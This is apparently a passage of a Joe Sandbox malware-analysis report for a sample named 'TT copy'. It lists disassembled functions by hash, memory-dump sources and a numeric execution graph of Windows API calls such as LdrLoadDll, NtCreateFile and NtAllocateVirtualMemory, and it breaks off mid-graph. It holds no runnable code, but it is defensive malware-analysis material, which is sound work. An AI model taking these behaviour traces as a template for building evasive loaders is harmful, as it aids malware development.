                                                                                                            • Opcode Fuzzy Hash: bfe0248dec22cc6a5d059569eef74e44637851cf9e4707d53e668302b4ea8bf6
                                                                                                            • Instruction Fuzzy Hash: E012A3F94117468BE330CF65EED81893BA1B745328F904208D2E12FAD9D7BE156ACF84
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06EB1F18 Relevance: .3, Instructions: 277COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293834062.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6eb0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8cd5ae408ffcb84415e25db4ddf755f99c3c8e1df49fe26849e6a7514760ef4a
                                                                                                            • Instruction ID: e9486ca6f85b542c7486397c261418879fec22dad1dd55b7fa5c48ed4bd7a31a
                                                                                                            • Opcode Fuzzy Hash: 8cd5ae408ffcb84415e25db4ddf755f99c3c8e1df49fe26849e6a7514760ef4a
                                                                                                            • Instruction Fuzzy Hash: B2E10831D2575A8ACB00EBB4C9906DDF3B1EF95300F61DB9AD1097B265EB706AC4CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00E5BF9C Relevance: .3, Instructions: 265COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.287145616.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e50000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: dd2f35ff39bf1ccc5a3be252b89a959dcf9fa712a53ae1d12e4553a747dd7ed5
                                                                                                            • Instruction ID: ac8461fadf9e2b103eb4c069ba247a9a305178dea8e48cc89537b2eaed635f96
                                                                                                            • Opcode Fuzzy Hash: dd2f35ff39bf1ccc5a3be252b89a959dcf9fa712a53ae1d12e4553a747dd7ed5
                                                                                                            • Instruction Fuzzy Hash: 0BA19D36E006198FCF19DFB4C9445DDBBF2FF88305B15896AE805BB265DB31A949CB40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06EB1F28 Relevance: .3, Instructions: 264COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293834062.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6eb0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 997cb20ae4cc98f0ef6d4091c8cf116e7d362f73c9ff83050a05add025cbbc9d
                                                                                                            • Instruction ID: e39975d2e9c53dc61bb095b3252df97ad907d41c9d2f785730d52098cfab6be8
                                                                                                            • Opcode Fuzzy Hash: 997cb20ae4cc98f0ef6d4091c8cf116e7d362f73c9ff83050a05add025cbbc9d
                                                                                                            • Instruction Fuzzy Hash: E9D1F731D2175A8ACB00EBA4C9906DDF3B1EF95200F61DB9AD1093B265EB706AC4CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00E5E968 Relevance: .2, Instructions: 222COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.287145616.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e50000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 55a5df4ed72265888c4cd57343d63c15a3b80396265e8961b4f3156f0c99ba70
                                                                                                            • Instruction ID: fce1098d3990d9c383ef30a185e4f7c59517131dfc5aa0f3345b611843f4a67e
                                                                                                            • Opcode Fuzzy Hash: 55a5df4ed72265888c4cd57343d63c15a3b80396265e8961b4f3156f0c99ba70
                                                                                                            • Instruction Fuzzy Hash: 89C13BF98117468BD720CF65EED81893B71BB95328F504308D2E12B6D9D7BE14AACF84
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06EB8570 Relevance: .2, Instructions: 160COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293834062.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6eb0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 623711550ae33ad61c57b04db82095c09dc32c1693f5a7c15b70dee747972f9d
                                                                                                            • Instruction ID: 96fdbb8acdd3242062beec3c8334e7a9e9b592d1571d9c36a38352f81ee45d4c
                                                                                                            • Opcode Fuzzy Hash: 623711550ae33ad61c57b04db82095c09dc32c1693f5a7c15b70dee747972f9d
                                                                                                            • Instruction Fuzzy Hash: 23611E70E06746CFD744DFB6E54169E7BF3AFC8308F04C52AD1089B2A4EB7459468B51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06EE78D0 Relevance: .2, Instructions: 159COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293968631.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ee0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3ec3f57d7a0a0f27309305e678abea1fb71135daa7e5f8397ca5dc282d6c9768
                                                                                                            • Instruction ID: c7b5a4efdaaff8f70f666f0c5cbe054f4ea4beaecc7363b4d8d0b7dd5370e7cc
                                                                                                            • Opcode Fuzzy Hash: 3ec3f57d7a0a0f27309305e678abea1fb71135daa7e5f8397ca5dc282d6c9768
                                                                                                            • Instruction Fuzzy Hash: DC614E70E066098FD748EFBAE44169EBBF3BB88308F05D529D1049B264EF345A46CF41
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06EE6D38 Relevance: .1, Instructions: 134COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293968631.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ee0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5c11bb2769a5f65b7edb66f35f94e28cf75c4b6de16f9407fa6aa686e45a67c6
                                                                                                            • Instruction ID: ff48024dd8cd34928841f8255dab2a4a7bd6fa5ed3ea0da346361522d0c33515
                                                                                                            • Opcode Fuzzy Hash: 5c11bb2769a5f65b7edb66f35f94e28cf75c4b6de16f9407fa6aa686e45a67c6
                                                                                                            • Instruction Fuzzy Hash: 4E411474E09208CFDB48DF9AD8806EEBBF6AF99304F24A029D409A7265D7305A01CF90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06EE7F70 Relevance: .1, Instructions: 108COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293968631.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ee0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5813732bf40fcfad41510b4716e3f95e10f9c5cfed6d0cb545747e83c3c5b715
                                                                                                            • Instruction ID: 7014357abf25f08b047e1299e2cf4f18c1b4e9cb5d9c943341151e6d29484d62
                                                                                                            • Opcode Fuzzy Hash: 5813732bf40fcfad41510b4716e3f95e10f9c5cfed6d0cb545747e83c3c5b715
                                                                                                            • Instruction Fuzzy Hash: 88413C71E15A18CFEB68CF6B8D4079AFAF7AFC9201F14D1FA840CA6255EB3449818F51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06EE001F Relevance: .1, Instructions: 97COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293968631.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ee0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 52cd86245aed8ae8123e5a9de6bf1ad3d62a012ad74013ec8edab86f34dd4d62
                                                                                                            • Instruction ID: 168cd33ffb2e34d8996228fb0b565658dcb9c2a6bff6f3b2565aa837a95c1e06
                                                                                                            • Opcode Fuzzy Hash: 52cd86245aed8ae8123e5a9de6bf1ad3d62a012ad74013ec8edab86f34dd4d62
                                                                                                            • Instruction Fuzzy Hash: 59416371D05B598BEB5CCF6B9D4079AFAF3AFC9200F18C1FA844CAA265EB3405458F51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06EE0040 Relevance: .1, Instructions: 96COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293968631.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ee0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0ecf892a97b246ced258ddb2086f3edb528e9ca7c3ed4a8d1dcecfdc26c7e67f
                                                                                                            • Instruction ID: 2cc40171af68b9b1c742aa6128fc0ed8de72cb7aad5fd6b5a0844e53d1925e97
                                                                                                            • Opcode Fuzzy Hash: 0ecf892a97b246ced258ddb2086f3edb528e9ca7c3ed4a8d1dcecfdc26c7e67f
                                                                                                            • Instruction Fuzzy Hash: 91415071E05A598BEB5CCF6BDD4079AFAF3AFC9205F14C1BA840CAB225EB3405858F51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:4.2%
                                                                                                            Dynamic/Decrypted Code Coverage:2.6%
                                                                                                            Signature Coverage:5.6%
                                                                                                            Total number of Nodes:622
                                                                                                            Total number of Limit Nodes:71
                                                                                                            execution_graph 34018 41f290 34019 41f29b 34018->34019 34021 41b9e0 34018->34021 34022 41ba06 34021->34022 34033 409170 34022->34033 34024 41ba12 34032 41ba59 34024->34032 34041 40d780 34024->34041 34026 41ba27 34027 41ba3c 34026->34027 34089 41a670 34026->34089 34053 40ac20 34027->34053 34030 41ba4b 34031 41a670 2 API calls 34030->34031 34031->34032 34032->34019 34034 40917d 34033->34034 34092 4090c0 34033->34092 34036 409184 34034->34036 34104 409060 34034->34104 34036->34024 34042 40d7ac 34041->34042 34517 40a620 34042->34517 34044 40d7be 34521 40d690 34044->34521 34047 40d7f1 34050 40d802 34047->34050 34052 41a450 2 API calls 34047->34052 34048 40d7d9 34049 40d7e4 34048->34049 34051 41a450 2 API calls 34048->34051 34049->34026 34050->34026 34051->34049 34052->34050 34054 40ac45 34053->34054 34055 40a620 LdrLoadDll 34054->34055 34056 40ac9c 34055->34056 34540 40a2a0 34056->34540 34058 40af13 34058->34030 34059 40acc2 34059->34058 34549 415000 34059->34549 34061 40ad07 34061->34058 34552 407e20 34061->34552 34063 40ad4b 34063->34058 34569 41a4c0 34063->34569 34067 40ada1 34068 40ada8 34067->34068 34581 419fd0 34067->34581 34070 41bef0 2 API calls 34068->34070 34071 40adb5 34070->34071 34071->34030 34073 40adf2 34074 41bef0 2 API calls 34073->34074 34075 40adf9 34074->34075 34075->34030 34076 40ae02 34077 40d810 3 API calls 34076->34077 34078 40ae76 34077->34078 34078->34068 34079 40ae81 34078->34079 34080 41bef0 2 API calls 34079->34080 34081 40aea5 34080->34081 34586 41a020 34081->34586 34084 419fd0 2 API calls 34085 40aee0 34084->34085 34085->34058 34591 419de0 34085->34591 34088 41a670 2 API calls 34088->34058 34090 41af70 LdrLoadDll 34089->34090 34091 41a68f ExitProcess 34090->34091 34091->34027 34124 418b90 34092->34124 34096 4090e6 34096->34034 34097 4090dc 34097->34096 34131 41b320 34097->34131 34099 409123 34099->34096 34142 408ee0 34099->34142 34101 409143 34148 408930 LdrLoadDll 34101->34148 34103 409155 34103->34034 34105 409070 34104->34105 34491 41b610 34105->34491 34108 41b610 LdrLoadDll 34109 40908b 34108->34109 34110 41b610 LdrLoadDll 34109->34110 34111 4090a1 34110->34111 34112 40d580 34111->34112 34113 40d599 34112->34113 34499 40a4a0 34113->34499 34115 40d5ac 34503 41a1a0 34115->34503 34118 409195 34118->34024 34120 40d5d2 34121 40d5fd 34120->34121 34509 41a220 34120->34509 34122 41a450 2 API calls 34121->34122 34122->34118 34125 418b9f 34124->34125 34149 415ab0 34125->34149 34127 4090d3 34128 418a40 34127->34128 34155 41a5c0 34128->34155 34132 41b339 34131->34132 34162 4156b0 34132->34162 34134 41b351 34135 41b35a 34134->34135 34201 41b160 34134->34201 34135->34099 34137 41b36e 34137->34135 34218 419ec0 34137->34218 34145 408efa 34142->34145 34469 407220 34142->34469 34144 408f01 34144->34101 34145->34144 34482 4074e0 34145->34482 34148->34103 34150 415aca 34149->34150 34151 415abe 34149->34151 34150->34127 34151->34150 34154 415f30 LdrLoadDll 34151->34154 34153 415c1c 34153->34127 34154->34153 34158 41af70 34155->34158 34157 418a55 34157->34097 34159 41af7f 34158->34159 34161 41aff5 34158->34161 34160 415ab0 LdrLoadDll 34159->34160 34159->34161 34160->34161 34161->34157 34163 4159e5 34162->34163 34164 4156c4 34162->34164 34163->34134 34164->34163 34226 419c10 34164->34226 34167 4157f0 34229 41a320 34167->34229 34168 4157d3 34286 41a420 LdrLoadDll 34168->34286 34171 415817 34173 41bef0 2 API calls 34171->34173 34172 4157dd 34172->34134 34176 415823 34173->34176 34174 4159a9 34175 41a450 2 API calls 34174->34175 34178 4159b0 34175->34178 34176->34172 34176->34174 34177 4159bf 34176->34177 34181 4158b2 34176->34181 34295 4153f0 LdrLoadDll NtReadFile NtClose 34177->34295 34178->34134 34180 4159d2 34180->34134 34182 415919 34181->34182 34184 4158c1 34181->34184 34182->34174 34183 41592c 34182->34183 34288 41a2a0 34183->34288 34186 4158c6 34184->34186 34187 4158da 34184->34187 34287 4152b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 34186->34287 34188 4158f7 34187->34188 34189 4158df 34187->34189 34188->34178 34244 415070 34188->34244 34232 415350 34189->34232 34194 4158d0 34194->34134 34195 4158ed 34195->34134 34197 41598c 34292 41a450 34197->34292 34198 41590f 34198->34134 34200 415998 34200->34134 34202 41b17b 34201->34202 34203 41b18d 34202->34203 34313 41be70 34202->34313 34203->34137 34205 41b1ad 34316 414cd0 34205->34316 34207 41b1d0 34207->34203 34208 414cd0 3 API calls 34207->34208 34210 41b1f2 34208->34210 34210->34203 34341 415ff0 34210->34341 34211 41b27a 34212 41b28a 34211->34212 34436 41aef0 LdrLoadDll 34211->34436 34352 41ad60 34212->34352 34215 41b2b8 34431 419e80 34215->34431 34219 41af70 LdrLoadDll 34218->34219 34220 419edc 34219->34220 34463 10a967a 34220->34463 34221 419ef7 34223 41bef0 34221->34223 34466 41a630 34223->34466 34225 41b3c9 34225->34099 34227 4157a4 34226->34227 34228 41af70 LdrLoadDll 34226->34228 34227->34167 34227->34168 34227->34172 34228->34227 34230 41af70 LdrLoadDll 34229->34230 34231 41a33c NtCreateFile 34230->34231 34231->34171 34233 41536c 34232->34233 34234 41a2a0 LdrLoadDll 34233->34234 34235 41538d 34234->34235 34236 415394 34235->34236 34237 4153a8 34235->34237 34238 41a450 2 API calls 34236->34238 34239 41a450 2 API calls 34237->34239 34241 41539d 34238->34241 34240 4153b1 34239->34240 34296 41c100 LdrLoadDll RtlAllocateHeap 34240->34296 34241->34195 34243 4153bc 34243->34195 34245 4150bb 34244->34245 34246 4150ee 34244->34246 34248 41a2a0 LdrLoadDll 34245->34248 34247 415239 34246->34247 34252 41510a 34246->34252 34250 41a2a0 LdrLoadDll 34247->34250 34249 4150d6 34248->34249 34251 41a450 2 API calls 34249->34251 34258 415254 34250->34258 34253 4150df 34251->34253 34254 41a2a0 LdrLoadDll 34252->34254 34253->34198 34255 415125 34254->34255 34256 415141 34255->34256 34257 41512c 34255->34257 34262 415146 34256->34262 34269 41515c 34256->34269 34261 41a450 2 API calls 34257->34261 34309 41a2e0 LdrLoadDll 34258->34309 34260 41528e 34263 41a450 2 API calls 34260->34263 34264 415135 34261->34264 34265 41a450 2 API calls 34262->34265 34266 415299 34263->34266 34264->34198 34267 41514f 34265->34267 34266->34198 34267->34198 34268 415161 34273 415173 34268->34273 34300 41a3d0 34268->34300 34269->34268 34297 41c0c0 34269->34297 34272 4151c7 34274 4151de 34272->34274 34308 41a260 LdrLoadDll 34272->34308 34273->34198 34276 4151e5 34274->34276 34277 4151fa 34274->34277 34278 41a450 2 API calls 34276->34278 34279 41a450 2 API calls 34277->34279 34278->34273 34280 415203 34279->34280 34281 41522f 34280->34281 34303 41bcc0 34280->34303 34281->34198 34283 41521a 34284 41bef0 2 API calls 34283->34284 34285 415223 34284->34285 34285->34198 34286->34172 34287->34194 34289 41af70 LdrLoadDll 34288->34289 34290 415974 34289->34290 34291 41a2e0 LdrLoadDll 34290->34291 34291->34197 34293 41a46c NtClose 34292->34293 34294 41af70 LdrLoadDll 34292->34294 34293->34200 34294->34293 34295->34180 34296->34243 34310 41a5f0 34297->34310 34299 41c0d8 34299->34268 34301 41af70 LdrLoadDll 34300->34301 34302 41a3ec NtReadFile 34301->34302 34302->34272 34304 41bce4 34303->34304 34305 41bccd 34303->34305 34304->34283 34305->34304 34306 41c0c0 2 API calls 34305->34306 34307 41bcfb 34306->34307 34307->34283 34308->34274 34309->34260 34311 41af70 LdrLoadDll 34310->34311 34312 41a60c RtlAllocateHeap 34311->34312 34312->34299 34314 41be9d 34313->34314 34437 41a500 34313->34437 34314->34205 34317 414ce1 34316->34317 34319 414ce9 34316->34319 34317->34207 34318 414fbc 34318->34207 34319->34318 34440 41d0a0 34319->34440 34321 414d3d 34322 41d0a0 2 API calls 34321->34322 34326 414d48 34322->34326 34323 414d96 34325 41d0a0 2 API calls 34323->34325 34328 414daa 34325->34328 34326->34323 34445 41d140 34326->34445 34327 41d0a0 2 API calls 34330 414e1d 34327->34330 34328->34327 34329 41d0a0 2 API calls 34338 414e65 34329->34338 34330->34329 34332 414f94 34452 41d100 LdrLoadDll RtlFreeHeap 34332->34452 34334 414f9e 34453 41d100 LdrLoadDll RtlFreeHeap 34334->34453 34336 414fa8 34454 41d100 LdrLoadDll RtlFreeHeap 34336->34454 34451 41d100 LdrLoadDll RtlFreeHeap 34338->34451 34339 414fb2 34455 41d100 LdrLoadDll RtlFreeHeap 34339->34455 34342 416001 34341->34342 34343 4156b0 8 API calls 34342->34343 34348 416017 34343->34348 34344 416020 34344->34211 34345 416057 34346 41bef0 2 API calls 34345->34346 34347 416068 34346->34347 34347->34211 34348->34344 34348->34345 34349 4160a3 34348->34349 34350 41bef0 2 API calls 34349->34350 34351 4160a8 34350->34351 34351->34211 34456 41abf0 34352->34456 34354 41ad74 34355 41abf0 LdrLoadDll 34354->34355 34356 41ad7d 34355->34356 34357 41abf0 LdrLoadDll 34356->34357 34358 41ad86 34357->34358 34359 41abf0 LdrLoadDll 34358->34359 34360 41ad8f 34359->34360 34361 41abf0 LdrLoadDll 34360->34361 34362 41ad98 34361->34362 34363 41abf0 LdrLoadDll 34362->34363 34364 41ada1 34363->34364 34365 41abf0 LdrLoadDll 34364->34365 34366 41adad 34365->34366 34367 41abf0 LdrLoadDll 34366->34367 34368 41adb6 34367->34368 34369 41abf0 LdrLoadDll 34368->34369 34370 41adbf 34369->34370 34371 41abf0 LdrLoadDll 34370->34371 34372 41adc8 34371->34372 34373 41abf0 LdrLoadDll 34372->34373 34374 41add1 34373->34374 34375 41abf0 LdrLoadDll 34374->34375 34376 41adda 34375->34376 34377 41abf0 LdrLoadDll 34376->34377 34378 41ade6 34377->34378 34379 41abf0 LdrLoadDll 34378->34379 34380 41adef 34379->34380 34381 41abf0 LdrLoadDll 34380->34381 34382 41adf8 34381->34382 34383 41abf0 LdrLoadDll 34382->34383 34384 41ae01 34383->34384 34385 41abf0 LdrLoadDll 34384->34385 34386 41ae0a 34385->34386 34387 41abf0 LdrLoadDll 34386->34387 34388 41ae13 34387->34388 34389 41abf0 LdrLoadDll 34388->34389 34390 41ae1f 34389->34390 34391 41abf0 LdrLoadDll 34390->34391 34392 41ae28 34391->34392 34393 41abf0 LdrLoadDll 34392->34393 34394 41ae31 34393->34394 34395 41abf0 LdrLoadDll 34394->34395 34396 41ae3a 34395->34396 34397 41abf0 LdrLoadDll 34396->34397 34398 41ae43 34397->34398 34399 41abf0 LdrLoadDll 34398->34399 34400 41ae4c 34399->34400 34401 41abf0 LdrLoadDll 34400->34401 34402 41ae58 34401->34402 34403 41abf0 LdrLoadDll 34402->34403 34404 41ae61 34403->34404 34405 41abf0 LdrLoadDll 34404->34405 34406 41ae6a 34405->34406 34407 41abf0 LdrLoadDll 34406->34407 34408 41ae73 34407->34408 34409 41abf0 LdrLoadDll 34408->34409 34410 41ae7c 34409->34410 34411 41abf0 LdrLoadDll 34410->34411 34412 41ae85 34411->34412 34413 41abf0 LdrLoadDll 34412->34413 34414 41ae91 34413->34414 34415 41abf0 LdrLoadDll 34414->34415 34416 41ae9a 34415->34416 34417 41abf0 LdrLoadDll 34416->34417 34418 41aea3 34417->34418 34419 41abf0 LdrLoadDll 34418->34419 34420 41aeac 34419->34420 34421 41abf0 LdrLoadDll 34420->34421 34422 41aeb5 34421->34422 34423 41abf0 LdrLoadDll 34422->34423 34424 41aebe 34423->34424 34425 41abf0 LdrLoadDll 34424->34425 34426 41aeca 34425->34426 34427 41abf0 LdrLoadDll 34426->34427 34428 41aed3 34427->34428 34429 41abf0 LdrLoadDll 34428->34429 34430 41aedc 34429->34430 34430->34215 34432 41af70 LdrLoadDll 34431->34432 34433 419e9c 34432->34433 34462 10a9860 LdrInitializeThunk 34433->34462 34434 419eb3 34434->34137 34436->34212 34438 41af70 LdrLoadDll 34437->34438 34439 41a51c NtAllocateVirtualMemory 34438->34439 34439->34314 34441 41d0b0 34440->34441 34442 41d0b6 34440->34442 34441->34321 34443 41c0c0 2 API calls 34442->34443 34444 41d0dc 34443->34444 34444->34321 34446 41d165 34445->34446 34449 41d19d 34445->34449 34447 41c0c0 2 API calls 34446->34447 34448 41d17a 34447->34448 34450 41bef0 2 API calls 34448->34450 34449->34326 34450->34449 34451->34332 34452->34334 34453->34336 34454->34339 34455->34318 34457 41ac0b 34456->34457 34458 415ab0 LdrLoadDll 34457->34458 34459 41ac2b 34458->34459 34460 415ab0 LdrLoadDll 34459->34460 34461 41acdf 34459->34461 34460->34461 34461->34354 34461->34461 34462->34434 34464 10a968f LdrInitializeThunk 34463->34464 34465 10a9681 34463->34465 34464->34221 34465->34221 34467 41af70 LdrLoadDll 34466->34467 34468 41a64c RtlFreeHeap 34467->34468 34468->34225 34470 407230 34469->34470 34471 40722b 34469->34471 34472 41be70 2 API calls 34470->34472 34471->34145 34475 407255 34472->34475 34473 4072b8 34473->34145 34474 419e80 2 API calls 34474->34475 34475->34473 34475->34474 34476 4072be 34475->34476 34480 41be70 2 API calls 34475->34480 34485 41a580 34475->34485 34477 4072e4 34476->34477 34479 41a580 2 API calls 34476->34479 34477->34145 34481 4072d5 34479->34481 34480->34475 34481->34145 34483 41a580 2 API calls 34482->34483 34484 4074fe 34483->34484 34484->34101 34486 41a59c 34485->34486 34487 41af70 LdrLoadDll 34485->34487 34490 10a96e0 LdrInitializeThunk 34486->34490 34487->34486 34488 41a5b3 34488->34475 34490->34488 34492 41b633 34491->34492 34495 40a150 34492->34495 34496 40a174 34495->34496 34497 40a1b0 LdrLoadDll 34496->34497 34498 40907a 34496->34498 34497->34498 34498->34108 34501 40a4c3 34499->34501 34500 40a540 34500->34115 34501->34500 34515 419c50 LdrLoadDll 34501->34515 34504 41af70 LdrLoadDll 34503->34504 34505 40d5bb 34504->34505 34505->34118 34506 41a790 34505->34506 34507 41a7af LookupPrivilegeValueW 34506->34507 34508 41af70 LdrLoadDll 34506->34508 34507->34120 34508->34507 34510 41a22e 34509->34510 34511 41af70 LdrLoadDll 34510->34511 34512 41a23c 34511->34512 34516 10a9910 LdrInitializeThunk 34512->34516 34513 41a25b 34513->34121 34515->34500 34516->34513 34518 40a647 34517->34518 34519 40a4a0 LdrLoadDll 34518->34519 34520 40a676 34519->34520 34520->34044 34522 40d6aa 34521->34522 34530 40d760 34521->34530 34523 40a4a0 LdrLoadDll 34522->34523 34524 40d6cc 34523->34524 34531 419f00 34524->34531 34526 40d70e 34534 419f40 34526->34534 34529 41a450 2 API calls 34529->34530 34530->34047 34530->34048 34532 41af70 LdrLoadDll 34531->34532 34533 419f1c 34531->34533 34532->34533 34533->34526 34535 41af70 LdrLoadDll 34534->34535 34536 419f5c 34535->34536 34539 10a9fe0 LdrInitializeThunk 34536->34539 34537 40d754 34537->34529 34539->34537 34541 40a2b1 34540->34541 34542 40a2ad 34540->34542 34543 40a2ca 34541->34543 34544 40a2fc 34541->34544 34542->34059 34596 419c90 LdrLoadDll 34543->34596 34597 419c90 LdrLoadDll 34544->34597 34546 40a30d 34546->34059 34548 40a2ec 34548->34059 34550 40d810 3 API calls 34549->34550 34551 415026 34550->34551 34551->34061 34553 407eec 34552->34553 34554 407e3e 34552->34554 34555 407fac 34553->34555 34557 407220 4 API calls 34553->34557 34560 407fca 34553->34560 34556 407220 4 API calls 34554->34556 34555->34560 34631 40da80 10 API calls 34555->34631 34563 407e48 34556->34563 34565 407f0d 34557->34565 34559 407fc0 34559->34063 34560->34063 34562 407b20 17 API calls 34562->34565 34563->34553 34564 407ee2 34563->34564 34598 407b20 34563->34598 34566 4074e0 2 API calls 34564->34566 34565->34555 34565->34562 34567 407fa2 34565->34567 34566->34553 34568 4074e0 2 API calls 34567->34568 34568->34555 34570 41af70 LdrLoadDll 34569->34570 34571 41a4dc 34570->34571 34769 10a98f0 LdrInitializeThunk 34571->34769 34572 40ad82 34574 40d810 34572->34574 34575 40d82d 34574->34575 34770 419f80 34575->34770 34578 40d875 34578->34067 34579 419fd0 2 API calls 34580 40d89e 34579->34580 34580->34067 34582 419fec 34581->34582 34583 41af70 LdrLoadDll 34581->34583 34776 10a9780 LdrInitializeThunk 34582->34776 34583->34582 34584 40ade5 34584->34073 34584->34076 34587 41af70 LdrLoadDll 34586->34587 34588 41a03c 34587->34588 34777 10a97a0 LdrInitializeThunk 34588->34777 34589 40aeb9 34589->34084 34592 41af70 LdrLoadDll 34591->34592 34593 419dfc 34592->34593 34778 10a9a20 LdrInitializeThunk 34593->34778 34594 40af0c 34594->34088 34596->34548 34597->34546 34599 407b45 34598->34599 34632 419cd0 34599->34632 34602 407b99 34602->34563 34603 407c1a 34667 40d960 LdrLoadDll NtClose 34603->34667 34604 419ec0 2 API calls 34605 407bbd 34604->34605 34605->34603 34607 407bc8 34605->34607 34608 407c46 34607->34608 34635 40af20 34607->34635 34608->34563 34609 407c35 34611 407c52 34609->34611 34612 407c3c 34609->34612 34668 419d50 LdrLoadDll 34611->34668 34614 41a450 2 API calls 34612->34614 34613 407be2 34613->34608 34655 407950 34613->34655 34614->34608 34616 407c7d 34618 40af20 5 API calls 34616->34618 34620 407c9d 34618->34620 34620->34608 34669 419d80 LdrLoadDll 34620->34669 34622 407cc2 34670 419e10 LdrLoadDll 34622->34670 34624 407cdc 34625 419de0 2 API calls 34624->34625 34626 407ceb 34625->34626 34627 41a450 2 API calls 34626->34627 34628 407cf5 34627->34628 34671 407720 34628->34671 34630 407d09 34630->34563 34631->34559 34633 41af70 LdrLoadDll 34632->34633 34634 407b8f 34633->34634 34634->34602 34634->34603 34634->34604 34637 40af4b 34635->34637 34636 40d810 3 API calls 34638 40afaa 34636->34638 34637->34636 34639 419fd0 2 API calls 34638->34639 34648 40aff3 34638->34648 34640 40afd5 34639->34640 34641 40afdc 34640->34641 34644 40afff 34640->34644 34642 41a020 2 API calls 34641->34642 34643 40afe9 34642->34643 34645 41a450 2 API calls 34643->34645 34646 40b069 34644->34646 34647 40b049 34644->34647 34645->34648 34650 41a020 2 API calls 34646->34650 34649 41a450 2 API calls 34647->34649 34648->34613 34651 40b056 34649->34651 